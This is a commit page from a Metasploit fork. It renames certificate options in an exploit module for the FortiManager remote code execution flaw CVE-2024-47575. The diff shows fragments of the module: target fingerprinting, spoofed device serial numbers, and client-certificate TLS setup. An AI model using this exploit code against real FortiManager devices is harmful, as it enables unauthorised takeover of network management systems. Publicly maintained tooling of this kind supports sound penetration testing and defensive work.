adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

rename SSLClientCert and SSLClientKey to ClientCert and ClientKey. This then matcheds up with ClientSerialNumber and ClientPlatform, which is clearer IMHO. Also, we explicitly create a Rex TCP socket, so these param names no longer collide with what a mixin would use

Browse Source
This commit is contained in:
sfewer-r7
2024-11-15 09:44:50 +00:00
parent 6eb15d5b66
commit c3bd4792ec
1 changed files with 8 additions and 8 deletions
Download Patch File Download Diff File Expand all files Collapse all files
modules/exploits/linux/misc/fortimanager_rce_cve_2024_47575.rb
+8 -8
View File
@@ -70,9 +70,9 @@ class MetasploitModule < Msf::Exploit::Remote
register_options(
[
OptString.new('SSLClientCert', [true, 'A file path to an x509 cert, signed by Fortinet, with a serial number in the CN', nil]),
OptString.new('SSLClientKey', [true, 'A file path to the corresponding private key for the SSLClientCert.', nil]),
OptString.new('ClientSerialNumber', [false, 'If set, use this serial number instead of extracting one from the SSLClientCert.', nil]),
OptString.new('ClientCert', [true, 'A file path to an x509 cert, signed by Fortinet, with a serial number in the CN', nil]),
OptString.new('ClientKey', [true, 'A file path to the corresponding private key for the ClientCert.', nil]),
OptString.new('ClientSerialNumber', [false, 'If set, use this serial number instead of extracting one from the ClientCert.', nil]),
OptString.new('ClientPlatform', [false, 'If set, use this platform instead of determining the platform at runtime.', nil])
]
)
@@ -92,13 +92,13 @@ class MetasploitModule < Msf::Exploit::Remote
# Detect that the target is a Fortinet FortiManager, by inspecting the certificate the server is using.
# We look for an organization (O) of 'Fortinet', and a common name (CN) that starts with a FortiManager serial
# number identifier.
return CheckCode::Detected if organization == 'Fortinet' && common_name&.start_with?('FMG-')
return CheckCode::Detected if organization == 'Fortinet' && common_name&.start_with?('FMG')
CheckCode::Unknown
end
def exploit
client_cert_raw = File.read(datastore['SSLClientCert'])
client_cert_raw = File.read(datastore['ClientCert'])
client_cert = OpenSSL::X509::Certificate.new(client_cert_raw)
@@ -109,7 +109,7 @@ class MetasploitModule < Msf::Exploit::Remote
serial_number = 'FMG-VMTM24011111'
platform = 'FortiManager-VM64'
if common_name.start_with?('FMG-')
if common_name.start_with?('FMG')
serial_number = common_name
platform = 'FortiManager-VM64'
elsif common_name.start_with?('FG')
@@ -174,8 +174,8 @@ class MetasploitModule < Msf::Exploit::Remote
'PeerPort' => datastore['RPORT'],
'SSL' => true,
'SSLVerifyMode' => 'NONE',
'SSLClientCert' => datastore['SSLClientCert'],
'SSLClientKey' => datastore['SSLClientKey'],
'SSLClientCert' => datastore['ClientCert'],
'SSLClientKey' => datastore['ClientKey'],
'Context' =>
{
'Msf' => framework,